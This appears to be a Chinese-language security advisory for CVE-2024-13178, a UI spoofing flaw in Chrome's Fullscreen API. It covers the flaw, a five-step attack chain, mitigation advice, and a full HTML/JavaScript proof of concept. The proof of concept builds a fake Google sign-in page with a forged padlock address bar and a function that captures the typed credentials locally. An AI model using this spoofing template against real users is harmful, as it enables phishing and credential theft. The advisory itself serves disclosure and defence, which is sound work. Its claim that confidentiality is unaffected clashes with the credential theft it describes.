CVE-2024-13178 Google Chrome Fullscreen API UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2024-13178

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2024-13178是Google Chrome中一个中危级别的UI欺骗漏洞。该漏洞存在于Chrome浏览器的Fullscreen（全屏）API实现中，由于实现不当，远程攻击者可以构造恶意的HTML页面，利用Fullscreen API进行UI欺骗攻击。攻击者能够通过精心设计的页面内容，让用户误以为他们正在查看合法的网站或执行合法的操作，而实际上用户的交互被重定向到了攻击者控制的界面。该漏洞影响Chrome 128.0.6613.84之前的所有版本，CVSS评分4.3，属于中等严重程度。虽然该漏洞不需要认证即可利用，但需要用户交互才能成功触发攻击。攻击向量为网络范围，复杂度低，对机密性和完整性无影响，但可能对可用性产生轻微影响。

技术细节

该漏洞的根本原因在于Google Chrome的Fullscreen API实现存在缺陷。Fullscreen API允许网页请求将整个页面或特定元素以全屏模式显示，正常情况下应该提供清晰的视觉指示让用户了解当前的全屏状态。然而，由于实现不当，攻击者可以滥用Fullscreen API来覆盖浏览器的原生UI元素，如地址栏、安全指示器等，从而实施钓鱼攻击。攻击者通过构造包含恶意JavaScript代码的HTML页面，调用requestFullscreen()等API方法，配合CSS样式覆盖技术，可以创建一个看起来像合法网站的欺骗性界面。用户在此状态下输入的敏感信息（如登录凭证）将被攻击者窃取。攻击成功的关键在于诱导用户与恶意页面进行交互（如点击按钮或链接），以触发全屏请求。由于该漏洞影响浏览器核心安全UI组件，危害性不容忽视。

攻击链分析

STEP 1

步骤1: 诱导用户访问

攻击者通过钓鱼邮件、恶意链接或被篡改的网站诱导用户访问包含恶意HTML页面的网站

STEP 2

步骤2: 触发全屏请求

恶意页面通过JavaScript调用requestFullscreen() API请求全屏模式，用户需要点击交互才能触发

STEP 3

步骤3: 注入欺骗性UI

页面加载时，恶意JavaScript代码创建覆盖层，伪装成合法网站的登录表单、银行界面或其他敏感操作界面

STEP 4

步骤4: 覆盖浏览器UI

通过CSS定位和z-index技术，将恶意内容覆盖在浏览器原生UI元素上，隐藏真实地址栏和安全指示器

STEP 5

步骤5: 窃取用户凭证

用户在欺骗性界面中输入的敏感信息（如用户名、密码、信用卡号等）被攻击者通过JavaScript捕获

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2024-13178 PoC - UI Spoofing via Fullscreen API -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2024-13178 UI Spoofing PoC</title>
    <style>
        body { margin: 0; background: #1a1a2e; color: white; font-family: Arial, sans-serif; }
        .fake-ui {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            z-index: 999999;
        }
        .fake-address-bar {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 40px;
            background: #f8f9fa;
            display: flex;
            align-items: center;
            padding: 0 10px;
            box-sizing: border-box;
            color: #333;
            font-size: 14px;
        }
        .fake-form {
            background: white;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 10px 30px rgba(0,0,0,0.3);
            text-align: center;
        }
        input {
            width: 250px;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
            color: #333;
        }
        .attack-btn {
            background: #4285f4;
            color: white;
            border: none;
            padding: 12px 30px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <div id="malicious-content" style="display:none;">
        <div class="fake-ui">
            <div class="fake-address-bar">🔒 https://www.google.com</div>
            <div class="fake-form">
                <h2 style="color:#333;">Sign in to Google</h2>
                <input type="text" placeholder="Email or phone">
                <input type="password" placeholder="Password">
                <button class="attack-btn" onclick="stealCredentials()">Sign In</button>
            </div>
        </div>
    </div>

    <h1>CVE-2024-13178 UI Spoofing Demo</h1>
    <p>Click the button below to trigger fullscreen and see UI spoofing in action.</p>
    <button onclick="requestFullscreen()" style="padding:15px 30px;font-size:18px;cursor:pointer;">
        Enter Fullscreen (Click to trigger)
    </button>

    <script>
        async function requestFullscreen() {
            try {
                // Create and append malicious UI elements
                const maliciousDiv = document.createElement('div');
                maliciousDiv.innerHTML = document.getElementById('malicious-content').innerHTML;
                document.body.appendChild(maliciousDiv);
                
                // Request fullscreen on body
                await document.documentElement.requestFullscreen();
                
                // Overlay attack content
                document.querySelector('.fake-ui').style.display = 'flex';
            } catch (err) {
                console.error('Fullscreen request failed:', err);
            }
        }

        function stealCredentials() {
            // Simulate credential theft
            const inputs = document.querySelectorAll('input');
            const credentials = {
                email: inputs[0].value,
                password: inputs[1].value
            };
            console.log('Stolen credentials:', credentials);
            alert('Credentials captured! (This is a demo)');
        }
    </script>
</body>
</html>

影响范围

Google Chrome < 128.0.6613.84

防御指南

临时缓解措施

立即升级Google Chrome至最新稳定版本（128.0.6613.84或更高）。在完全修复前，用户应提高警惕，避免点击来源不明的链接，尤其是要求进入全屏模式的页面。访问敏感网站时，应养成手动输入URL的习惯，而非通过邮件或消息中的链接访问。启用浏览器的双因素认证功能，即使凭证被盗也能提供额外保护。